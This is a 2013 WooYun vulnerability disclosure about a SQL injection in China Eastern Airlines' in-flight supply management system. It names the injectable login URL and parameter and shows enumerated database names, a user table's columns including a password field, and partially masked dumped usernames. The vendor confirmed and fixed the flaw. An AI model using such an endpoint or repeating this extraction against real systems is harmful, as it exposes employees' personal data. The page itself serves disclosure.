当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-025179
漏洞标题:
东方航空-机供品餐食管理系统SQL注射可脱库
相关厂商:
中国东方航空股份有限公司
漏洞作者:
专业种田
提交时间:
2013-06-05 01:41
修复时间:
2013-07-20 01:42
公开时间:
2013-07-20 01:42
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-06-05: 细节已通知厂商并且等待厂商处理中
2013-06-05: 厂商已经确认,细节仅向厂商公开
2013-06-15: 细节向核心白帽子及相关领域专家公开
2013-06-25: 细节向普通白帽子公开
2013-07-05: 细节向实习白帽子公开
2013-07-20: 细节向公众公开

简要描述:

SQL注射

详细说明:

注射地址:http://jgp.ceair.com/JGP/Web/GYSWBJK/Login.aspx?F_DWID=1400

[*] AIRSUPPLY
[*] DBSNMP
[*] EXFSYS
[*] JGPTEST
[*] MDSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


漏洞证明:

[23 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| F_BLOGS         | VARCHAR2 |
| F_EMAIL         | VARCHAR2 |
| F_ENTRYDATE     | DATE     |
| F_HOMEADDRESS   | VARCHAR2 |
| F_HOMEPAGE      | VARCHAR2 |
| F_LEVELORDER    | NUMBER   |
| F_MOBILE        | VARCHAR2 |
| F_OFFICEFAX     | VARCHAR2 |
| F_OFFICEPHONE   | VARCHAR2 |
| F_OPERATEIP     | VARCHAR2 |
| F_OPERATETIME   | DATE     |
| F_OPERATEUSERID | NUMBER   |
| F_PASSWORD      | VARCHAR2 |
| F_PERSONALNOTES | VARCHAR2 |
| F_POSITIONID    | NUMBER   |
| F_POSTALCODE    | VARCHAR2 |
| F_PWDVALIDITY   | DATE     |
| F_STATE         | NUMBER   |
| F_USERCODE      | VARCHAR2 |
| F_USERID        | NUMBER   |
| F_USERNAME      | VARCHAR2 |
| F_USERSTATE     | NUMBER   |
| F_USERTYPE      | NUMBER   |
+-----------------+----------+


Database: AIRSUPPLY
Table: TB_SYSTEM_USERBK
[64 entries]
+------------+------------+
| F_PASSWORD | F_USERNAME |
+------------+------------+
| None       | 顾晓*        |
| None       | 姚*         |
| None       | 杨晓*        |
| None       | 赵珺*        |
| None       | 姚*        |
| None       | 魏庚*        |
| None       | 陈*         |
|
+------------+------------+


省略,我把名字*替换了

修复方案:

过滤

版权声明:转载请注明来源 专业种田@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-06-05 15:05

厂商回复:

十分感谢

最新状态:

2013-06-05:信息安全应急响应已处置完成,漏洞修复。